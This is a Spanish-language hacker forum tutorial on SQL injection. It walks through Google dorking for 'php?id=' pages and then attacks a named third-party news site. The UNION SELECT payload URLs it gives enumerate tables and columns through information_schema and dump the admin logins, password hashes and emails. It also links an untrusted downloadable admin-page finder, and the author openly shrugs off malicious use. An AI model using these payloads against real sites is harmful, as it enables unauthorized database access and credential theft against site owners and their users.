1-INTRODUCCION:Bueno sean bienvenidos amigos este es mi primer tuto escrito y por decirlo asi serio jeje bueno como algunos ya me conocen soy: S4W-3XPL0IT3R y bueno aqu vengo con un tutorial de SQL injection, mas bien este paper se puede decir que es como una pequea gua para los que no ha entendido bien que es una inyeccin SQl,(recuerden que para saber SQL tienen que aprender PHP,HTML,XSS entre otros)para que asi puedas entenderlo mejor aqu veremos un poco de PHP ) ok, bueno para ello les dire que es lo que leeran en este paper: y Cual es el significado de: SQL injection y otras cosas y Como encontrar una vulnerabilidad en alguna pagina web o usar el mismo google para buscar paginas vulnerables y Que hacer si la pagina es vulnerable(tcnica) Bueno empesaremos ya sin mas nada que decir ;)

2- DESCRIPCION:Bueno amigos en esta seccin describir o dare el significado segn wikipedia y segn mi conocimientos que significa SQL INJECTION

Wikipedia: Inyeccin SQL es un mtodo de infiltracin de cdigo intruso que sevale de una vulnerabilidad informtica presente en una aplicacin en el nivel de validacin de las entradas para realizar consultas a una base de datos.El origen de la vulnerabilidad radica en el incorrecto chequeo y/o filtrado de las variables utilizadas en un programa que contiene, o bien genera, cdigo SQL. Es, de hecho, un error de una clase ms general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programacin o script que est embebido dentro de otro.Se conoce como Inyeccin SQL, indistintamente, al tipo de vulnerabilidad, al mtodo de infiltracin, al hecho de incrustar cdigo SQL intruso y a la porcin de cdigo incrustado.

Mi opinin: bueno amigos segn mi opinin

SQL INJECTION es una

vulnerabilidad centrada en grandes consultas de cdigos que se orientan a la base de datos de la web, se puede sacar una vulnerabilidad web en cualquier tipo de lenguaje por eso les dije en la introduccin que tienen que saber algo de esos lenguajes jeje bueno algo asi describira lo que es SQL jeje (se que estn pensando que es mejor la explicacin de WIKI jej) bueno prosigamos ;)

3-BUSCANDO WEB`S VULNERABLES:Bueno aqu es donde empieza el JUEGO vamos a buscar una pagina web vulnerable en GOOGLE para ello nos digiriremos al buscador de google y escribiremos: php?id= Nota: hay tambin otros tipos de dorks pero diran que es eso pues eso que dice php?id= =P algunos ustedes los han visto tales como: php?act= php?opc entre otros . Bueno cuando encontremos una pagina la que yo escoji fue esta(http://www.ampos.com/noticias.php?id=9) ahora si vamos a proceder con lo que seria una consulta para ver si es vulnerable o no tendramos que poner esto: http://www.ampos.com/noticias.php?id=-1 http://www.ampos.com/noticias.php?id= 2 http://www.ampos.com/noticias.php?id=9999999999999999999 http://www.ampos.com/noticias.php?id=esas son las consultas bsicas que veremos en este tutorial bueno probamos con cualquiera de estas consultas y bueno porque genera este error; bueno porque seria algo raro ver una pagina web que tenga caracteres con estos simbolos o -1; bueno cuando hagamos la consulta nos tiene que salir este pequeo texto: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/ampos/public_html/noticias.php on line 266 Bueno como vemos el sitio en vulnerable a MySql Aca termina esta seccin asi que si ya se aburrieron bueno pues cierren y eliminen este paper no hay problema y si no pues sigan leyendo =P ;)

4-EFECTUAR EL ATAKE:Bueno amigos veo que les intereso my paper y no lo mandaron a la papelera jejeje bueno cambiando el tema en esta seccin lo que vamos a realizar es a efectuar el ataque bueno como ya se supone que encontramos la pagina vulnerable ahora empecemos a jugar con la page jeje ;)

Bueno amigos como vimos la pagina es: http://www.ampos.com/noticias.php?id=9 ahora lo que hare es consultar si es vul. http://www.ampos.com/noticias.php?id=-1 bueno ahora prosiguermos con que hace rato tenamos que empesar xD =P lo que haremos en poner en la url: http://www.ampos.com/noticias.php?id=-1+union+select+1-bueno explicare que hice aqu: lo que hice fue poner el -1, luego poner +unin+select que significa que yo quiero unir la la vulneribilidad que acabo de encontrar luego el +1 aqu vamos a ir poniendo los nmeros del 1 hasta el infinito con coma obviamente , xD hasta encontrar algn error en uno de esos nmeros pero que es lo que quieres decir? pues bueno ya vamos a eso! Bueno cuando ya tengamos nuestra pagina lista para buscar los errores procedemos a hacer lo que estaba explicando ahorita: http://www.ampos.com/noticias.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

bueno como ven el mio fue largo llego hasta el 20 tu pagina puede llegar al 5 o al 13 o hasta algunas veces puede llegar hasta el 45 o.O, bueno cuando ya tengamos hecho esto nos saldr algo asi en la pagina

con una serie de nmeros en diferente orden bueno acontinuacion estos son los nmeros que contienen los errores bueno ahora lo que procederemos a hacer es colocar este cdigo es uno de los nmeros que te saldr por ejemplo asi si no entendiste =P: http://www.ampos.com/noticias.php?id=1+union+select+1,replace%28group_concat%28table_name%29,0x2c,0x3c 62723e%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-como ven yo sustitu el 2 por el cdigo, esta aqu para que lo copien: replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 bueno ahora lo que hara este cdigo es sacarnos todas las tablas de una sola vez hay otra mtodo pero es mas aburrido xD =P , bueno ya haciendo esto ahora volveremos otra vez a la url y pondremos: +from+information_schema.tables Esto que nos sacara la info de schema tables bueno hay ponerlo antes de las 2 rayitas en la url seria asi: http://www.ampos.com/noticias.php?id=1+union+select+1,replace%28group_concat%28table_name%29,0x2c,0x3c 62723e%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+informa tion_schema.tables--

muy bien ya teniendo la url lista para que no muestre los datos solo damos enter a nuestra url y acontinuacion nos tienes que salir unas tablas mas o menos asi:

nota*: ver la imagen lo que dice =P bueno para ser lgicos amigos puedes salir varias palabras en la tabla como usuario,usuarios,users .etc bueno ya cuando encontremos la tabla procedemos a sacar las columnas que tiene esta para ello guardamos la palabra que nos sali de usuarios que es esta: admin_usuarios bueno ahora lo que procedemos a hacer es pasar la palabra a hexadecimal para ello nos digiriremos a esta web: http://www.swingnote.com/tools/texttohex.php muy bien de ah nos vamos adonde dice string que hay un cuadro a la par y pondremos la palabra de usuarios que nos sali en mi caso a mi me dio asi:61646d696e5f7573756172696f73

Es sencillo es difil que se pierdan nada mas copian la palabra y pegan en el cuadro y luego le dan convert y se van donde dice HEX y ah copean ese cdigo y listo xD Bueno cuando ya tengamos este cdigo lo que haremos ser poner la url con estos parmetros ;) http://www.ampos.com/noticias.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+information_schema.columns+where(table_name=0x61646d 696e5f7573756172696f73)limit+1,1--

bueno explicare; bueno primeramente borramos el cdigo que haba dado este: replace%28group_concat%28table_name%29,0x2c,0x3c62723e%29 y colocamos : columns_name porque se supone que vamos a sacar las columnas =P

luego donde dice: +from+information_schema.columns+where(table_name=0x61646d696e5 f7573756172696f73)limit+1,1 aqui lo que agregamos diferente fue despues de schema. Pusimos columns y luego le consultamos que busque la columna de usuarios y que donde esta o algo asi jeje que es esta palabra where luego agregamos que queremos que nos diga donde esta que seria (table_name= aqu nada mas vamos a nombrar cual tabla es la que queremos ver que seria la de usuarios pero lo que vamos a poner aqu es el code hexadecimal que es este: 61646d696e5f7573756172696f73

pero lo nico diferente es que tenernos que colocar un 0x entonces quedara algo asi: 0x61646d696e5f7573756172696f73 ahora recuerda que tienes que cerrar parntesis entonces hasta el momento llevamos todo esto explicado: +from+information_schema.columns+where(table_name=0x61646d696e5 f7573756172696f73) Ahora lo ultimo de explicar seria los limites que es esto limit+1,1 Bueno aqu lo que haremos lo explicare mas adelantito pero bueno ya tenemos todo lo que acabo de hacer creo que bien explicado Ahora solo haremos enter para que nos saque los errores que queremos que salgan Bueno acontinuacion mostrare las imgenes del procedimiento que hay que hacer:

Y bueno creo que ya vieron que hago ah y lo deje hasta aqu porque se supone que solo nos interesa el login y pass jejej bueno lo que yo hice fue esto: pongan mucha atencin!!! http://www.ampos.com/noticias.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+information_schema.columns+where(table_name=0x61646d 696e5f7573756172696f73)limit+1,1-http://www.ampos.com/noticias.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+information_schema.columns+where(table_name=0x61646d 696e5f7573756172696f73)limit+2,1--

http://www.ampos.com/noticias.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+information_schema.columns+where(table_name=0x61646d 696e5f7573756172696f73)limit+3,1-y fui cambiando los numero y recojiendo esa info copiando la palabra que deca por ejemplo login lo guardaba en un block de notas y asi con todas bueno ahora que ya tenemos esta info solo nos queda sacar lo mas

importante =P el login y la pass jejej para ello solo harn este pequeo cambio en la url: group_concat(login,0x3a,password,0x3a,email,0x3a,admin,0x3a,nombre) pero explicare este code: bueno sencillamente lo copian pero lo nico que tienen que sustituir es lo que dice login y password email y todo eso MENOSS el code que dice 0x3a eso siempre va despus del nombre de la columna si quieres sacar todos solo sustituyes los nombre ok PEROO otra cosita tambin es que en la ultima columna que escribas no ponga 0x3a entonces quedara algo asi como esta aca abajito donde colocamos column_name miralo aqui=

http://www.ampos.com/noticias.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+information_schema.columns+where(table_name=0x61646d 696e5f7573756172696f73)limit+1,1-vamos a colocar este code el ah arribita entonces hasta el momento quedara algo asi http://www.ampos.com/noticias.php?id=-1+union+select+1, group_concat(login,0x3a,password,0x3a,nombre),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20+from+

muy bien este es el ejemplo como ven donde dice nombre no pues 0x3a como les decia anteriormente ahora para completer el code tenemos que decirle a la page que de donde vamos a sacar las info entonces solo ponemos el nombre que nos sali de user o usuarios o lo que te alla salido relacionado entonces lo pondramos asi: http://www.ampos.com/noticias.php?id=1+union+select+1,group_concat(login,0x3a,password,0x3a,nombre),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin_usuario--

y bueno esto es todo amigos luego despus de eso les va a salir el login y la pass encriptada en MD5 o HASH o asi solita jeje

bueno y para que puedan sacar la pagina admin para loguearse en la page les recomiendo este programita es muy bueno lo subi a mediafire y no me digan que tienen virus lol lo uncio que tienen que hacer es poner la pagina simple como por ejemplo la mia seria asi:

http://www.ampos.com

entonces le damos en scan lo dejamos asi como esta y empesara a buscar y cuando encuentre una page admin se te abrir en tu navegador bueno aqu el link del programita: http://www.mediafire.com/?13zz8zr7eer145r bueno esto es todo amigos pasen a la despedida o mejor dicho a los crditos=P

5- DESPEDIDA:Bueno espero que les alla gustado este tuto creo que es algo completo jejej y bueno practiquen mucho para que asi se hagan maestros no como yo si no mejores que yo xD bueno aqu los crditos !!!!!!!BUENO LE DOY LOS CREDITOS TANTO YO MI PERSONAL XD COMO A MI AMIGO EXPLOIT-SHELL QUE FUE EL QUE ME AYUDO MUCHISIMO y me hizo salir adelante GRACIAS SHELL ! TAMBIEN ESTE TUTO VA DEDICADO A TODAS LAS COMUNIDADES QUE ESTOY REGISTRADO COMO UNDERC[0]DE, DRAGONJAR,MUNDOHACKING ENTRE OTRAS PERO EN ESPECIAL A LA COMUNIDAD DE : http://crosshack.com.ar GRACIAS POR APOYARME AMIGOS Y AH SEGUIRE COMPARTIENDO INFORMACION TAMBIEN LE MANDO SALU2 A MI AMIGO LIDERDIOS Y GRANDISIMOS SALU2 ESPECIALES A ANONYMOUS COSTA RICA RECUERDEN QUE SOMOS LEGION AMIGOS !!!!! BUENO YA PARA TERMINAR Y RESUMIR TODO ESTE TUTO VA DEDICADO PARA ANONYMOUS Y CROSSHACK.COM.AR JEJEJE OTRA VEZ Y BUENO SI QUIEREN CONTACTARSE CONMIGO FUE PORQUE LES CAI BIEN JEJEJ BUENO AQU MI MSN ME GUSTA HACER AMIGOS =P S4w_3xpl0it3@rocketmail.com BUENO RECUERDEN TODOS Y USAN ES UN@ BUENA FRASE: Si tienes algo para MI tendr algo para TI Kevin Mintick Este tuto lo hice tanto para tener conocimiento y usarlos para bien y si lo usan para mal ps no importa algn dia razonaran lol ok cuando sea ese dia me avisan =PDerecho preservado de S4W -Copia u imitacin de este articulo ser condenado a que su

PC no exista xD. SI QUIERES PERMISO DE MODIFICACION DE ESTE ARTICULO PORFAVOR PEDIR PERMISO OK =)